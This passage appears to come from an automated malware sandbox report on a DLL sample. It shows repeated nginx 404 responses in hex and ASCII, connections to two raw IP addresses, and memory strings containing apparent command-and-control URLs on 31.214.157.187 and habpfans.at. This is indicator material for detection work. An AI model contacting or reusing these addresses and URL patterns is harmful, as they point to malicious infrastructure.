20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:04:12 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:04:33 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:04:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:05:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:05:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:06:17 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:06:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.187
                      Source: loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194214.157.187/
                      Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.214.157.187/
                      Source: loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8
                      Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/
                      Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/8
                      Source: loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/8aMvIN0oJqk/wfo22krGhemAS6/6H_2FPRAH0bqwevjC8Pk5/kXre7OAlPZjP7YB8/
                      Source: loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/cmlyVQ2zwKm8fCRpP0VB/i6Zv1FcucRsB3XE0xRC/6VGWBAMEz_2Fh6VbcTZ9sL/wE
                      Source: WerFault.exe, 00000007.00000002.314858058.00000000049C9000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312995086.00000000049C8000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312888145.00000000049C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.777131845.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438896118.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.773036185.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://habpfans.at/
                      Source: loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w
                      Source: loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/
                      Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://habpfans.at/g
                      Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
